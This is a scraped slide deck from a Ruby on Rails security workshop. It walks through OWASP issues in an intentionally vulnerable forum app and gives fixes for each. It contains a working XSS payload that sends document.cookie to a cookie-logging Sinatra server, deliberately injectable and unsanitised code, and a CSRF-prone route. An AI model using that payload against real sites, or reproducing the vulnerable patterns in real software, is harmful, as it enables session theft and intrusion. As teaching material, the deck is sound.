Click here to load reader

RoR Workshop - Web applications hacking - Ruby on Rails example

  • View
    990

  • Download
    1

Embed Size (px)

Text of RoR Workshop - Web applications hacking - Ruby on Rails example

  • Web applications hackingRuby on Rails example

    by Karol Topolski

  • Software House located in Krakow Ruby on Rails, Android and iOS Specialized in building web and mobile applications Collaborating with many companies and startups from all over

    the world

    ABOUT US:

  • 2009 - software house was founded 50 projects created

    40 employeesAwards:

    OUR HISTORY:

    Top Web & Software Developers in Poland 2015

    Top Tens Ruby on Rails Development Companies

  • HOMEAHEAD

  • PROEST

  • Software for gastronomy

  • OWASP TOP 101. Injection2. Broken authentication and session management3. Cross-Site Scripting4. Insecure direct object reference5. Security misconfiguration6. Sensitive data exposure7. Missing function level access control8. Cross-Site Request Forgery9. Using components with known vulnerabilities

    10. Unvalidated redirects and forwards

  • Target Application

  • Simple Ruby on Rails forum

    Ruby 2.3.0

    Rails 4.2.6

    PostgreSQL 9.4

    https://github.com/railwaymen/hacking-forum.git

  • PostgreSQL Database schema

  • # app/controllers/forum_threads_controller.rb

    class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title: params[:title] endend

    # config/routes.rb

    resources :forum_threads, param: :title, only: :show do resources :comments, only: :createend

    SEARCHING THE FORUM THREAD BY TITLE:

  • # app/controllers/forum_threads_controller.rb

    class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title = #{params[:title]} endend

    # config/routes.rb

    resources :forum_threads, param: :title, only: :show do resources :comments, only: :createend

    SEARCHING THE FORUM THREAD BY TITLE:

  • Is SQL injection impossible in Rails?

  • Unfortunately, no. Its possible,

    just not dropping tables.

  • Further reading:rails-sqli.org

  • # app/controllers/comments_controller.rb

    class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: Successfully added new comment else redirect_to @thread, alert: Couldnt save comment end end

    private

    def comment_params params.require(:comment).permit(:content) endend

    # app/views/forum_threads/show.haml%p= comment.content

    COMMENTS - create and show:

  • # app/controllers/comments_controller.rb

    class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: Successfully added new comment else redirect_to @thread, alert: Couldnt save comment end end

    private

    def comment_params params.require(:comment).permit(:content) endend

    # app/views/forum_threads/show.haml%p= comment.content.html_safe

    COMMENTS - create and show:

  • Hi guys!

    alert(I came for your cookies!)

    Whats up?

    xhttp = new XMLHttpRequest(); xhttp.open(GET, http://localhost:4567/cookies/ + document.cookie); xhttp.send();

    XSS ATTACK - TEST AND STEALING COOKIES

    http://localhost:4567/cookies/

  • require sinatrarequire logger

    logger = Logger.new log/cookies.log

    get /cookies/:cookie do logger.info === COOKIE === logger.info params[:cookie] logger.info /== COOKIE ===end

    XSS ATTACK - SIMPLE COOKIES LOGGING SERVER

  • Are all cookies HTTPOnly in Rails?

  • cookies[:after_sign_in_path] = http://localhost/after_sign_in_path// document.cookies=after_sign_in_path=http://malicious.site/phishing

    cookies.signed[:after_sign_in_path] = http://localhost/after_sign_in_path// document.cookies=after_sign_in_path=http://malicious.site/phishing

    cookies.signed[:after_sign_in_path] = { value: http://localhost/after_sign_in_path, httponly: true}// finally safe

    UNFORTUNATELY - NO. ALWAYS USE THIS HASH!

  • Its safe from cookies stealing,but is it safe from XSS?

  • # app/controllers/comments_controller.rb

    class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: Successfully added new comment else redirect_to @thread, alert: Couldnt save comment end end

    private

    def comment_params params.require(:comment).permit(:content) endend

    # app/views/forum_threads/show.haml%p= sanitize comment.content.html_safe

    COMMENTS - create and show:

  • Further reading:molily.de/xss/

  • # app/controllers/application_controller.rb

    class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs you may want to use :null_session instead. protect_from_forgery with: :exceptionend

    DEFAULT CSRF PROTECTION IN RAILS:

  • Is Rails CSRF protection unbreakable?

  • HTTP Verbs

    GET POST PUT PATCH DELETE HEAD OPTIONS TRACE CONNECT

  • HTTP Verbs NOT protected by Rails CSRF GET POST PUT PATCH DELETE HEAD OPTIONS TRACE CONNECT

  • CSRF pitfall in Rails routing

  • # config/routes.rb

    match /forum_threads/:forum_thread_id/comments/:id/update, to: comments#update, via: :all # Rails 4+

    CSRF PITFALL IN RAILS ROUTING - MATCH:

  • Is Rails CSRF protection 100% safe?

  • Yes it is - unless youre not staying close to Rails guides

  • Further reading: https://rorsecurity.info/portfolio/cross-site-

    request-forgery-and-rails

  • Sensitive data exposure

    1. Credentials leaking to public repositories.

    2. Lack of proper in-app authorization.

    3. Debugging information in production enviroments.

    4. Access not restricted, wrong access privileges.

    5. Lack of encryption.

    6. API responses containing sensitive data.

  • Protecting against sensitive data exposure

    1. Code reviews.

    2. Careful authorization.

    3. Strict access.

    4. Encryption.

    5. API exposing only necessary information.

  • Creating the secure API

  • # app/controllers/forum_threads_controller.rb

    def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads } endend

    GENERATED RAILS API

  • [ { id: 2, title: "Curabitur vel vulputate libero.", created_at: "2016-04-18T10:10:40.648Z", updated_at: "2016-04-18T10:10:40.648Z" }, { "id": 1, "title": "Lorem ipsum dolor sit amet.", "created_at": "2016-04-18T10:10:40.607Z", "updated_at": "2016-04-18T10:10:40.607Z" }]

    GENERATED RAILS API - OUTPUT

  • # app/controllers/forum_threads_controller.rb

    def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads.only(:title).to_json } endend

    GENERATED RAILS API - SECURING THE OUTPUT

  • [ { title: "Curabitur vel vulputate libero." }, { "title": "Lorem ipsum dolor sit amet." }]

    GENERATED RAILS API - SECURED OUTPUT

  • Solutions for building pretty, secure APIs

    Active Model Serializers

    Object Oriented approach Ability to define decorating methods All Ruby! Flexible Easy to test Adapter to follow JSON API v1.0 schema YARD documented

    Jbuilder

    Templates approach ERblike - might be easy for newcomers Flexible Hard to test No real adapter - if you want JSON

    API v1.0, you have to do it by yourself

  • Summary

  • Things to remember from this workshop:

    1. Never trust anything that comes from user. Params, cookies, headers, everything. Nothing that comes from user is safe to use.

    2. Always sanitize your HTML output. Especially when youre allowing links or images that comes from user.

    3. Be careful with match routing. Just dont use it if you dont have to.

    4. Inspect your outputs. Return only necessary information from your API.

    5. Last but not least. Get someone to review your code.

  • Thank you for your attention.

  • Na zjedzie 1130-527 Krakow, Polandtel: +48 12 391 60 76

    Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104tel: 1-415-449-4791

    info@railwaymen.org

    www.railwaymen.org

    @Railwaymen_org

    railwaymen.software.development

    /company/railwaymen

    mailto:info@railwaymen.orgmailto:info@railwaymen.orghttp://www.railwaymen.orghttp://www.railwaymen.org

Search related